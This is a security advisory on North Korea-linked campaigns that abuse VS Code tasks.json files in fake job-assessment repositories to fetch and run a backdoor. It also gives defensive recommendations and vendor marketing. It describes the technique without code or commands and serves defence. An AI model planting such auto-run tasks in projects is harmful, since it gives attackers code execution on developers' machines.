Threat actors expand abuse of Visual Studio Code

Threat summary

On January 20, researchers documented North Korea-linked threat actor activity targeting Microsoft Visual Studio (VS) Code using techniques that enable remote code execution when a developer opens a malicious project folder. The technique, first observed in December 2025, reflects an evolution of earlier job recruitment-related campaigns attributed to North Korea.

The activity relies on the use of Visual Studio Code configuration files to trigger attacker‑controlled commands. The attack abuses the `.vscode/tasks.json` file, a legitimate mechanism developers use to automate build and test workflows. When a user opens a project and grants trust to the workspace, Visual Studio Code executes the tasks defined in this file.

According to available reporting, threat actors embedded shell commands that download and run a JavaScript backdoor hosted on Vercel, a cloud platform used by developers to deploy web applications.

Execution begins as soon as the project is opened and the workspace trust prompt is accepted, requiring no further user interaction and bypassing traditional malware delivery paths. The resulting impact includes remote code execution and the deployment of a backdoor implant capable of system reconnaissance and follow‑on actions.

Continuing the social-engineering pattern seen in prior North Korea‑linked operations, the operators instruct targets to clone repositories from GitHub, GitLab, or Bitbucket as part of a fake job assessment.

Insights

The exploitation difficulty is low because the attack uses legitimate functionality, meaning the primary obstacle for threat actors is persuading a developer to open a malicious repository. 

Visual Studio Code is a widely used integrated development environment created by Microsoft. It supports extensions, remote development, and workspace trust controls, and is used across enterprises, managed service providers, and software supply chains. Threat actors target Visual Studio Code largely because it enables malicious command execution through trusted developer workflows, providing direct access to source code and build environments with minimal user interaction.

Threat actors increasingly target the software development lifecycle itself (including repositories, build tools, package scripts, and trust prompts) because these pathways offer reliable execution without requiring a vulnerability.

Recommendations

Organizations can reduce exposure by limiting trust decisions within Visual Studio Code. Recommendations include enforcing workspace trust policies, restricting automatic task execution, and monitoring for unexpected `.vscode` directory changes. Development teams can adopt internal repository controls to reduce reliance on unverified external code, and endpoint monitoring can identify unexpected shell execution originating from Visual Studio Code processes.

Organizations can further reduce risk by training developers to treat external repositories as potential attack vectors. Incorporating Visual Studio Code configuration scanning into routine assessments and applying network controls that block unauthorized outbound connections can limit the impact of malicious tasks attempting to download remote payloads.

Field Effect MDR continuously monitors endpoint and network activity, detecting unusual script execution, unauthorized outbound connections, and suspicious repository-related behavior. Should malicious activity be identified, Field Effect MDR provides automated or analyst-driven response actions such as isolating affected endpoints and blocking outbound traffic to attacker infrastructure.

Stay on top of emerging threats like this.

Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities. 

Sign up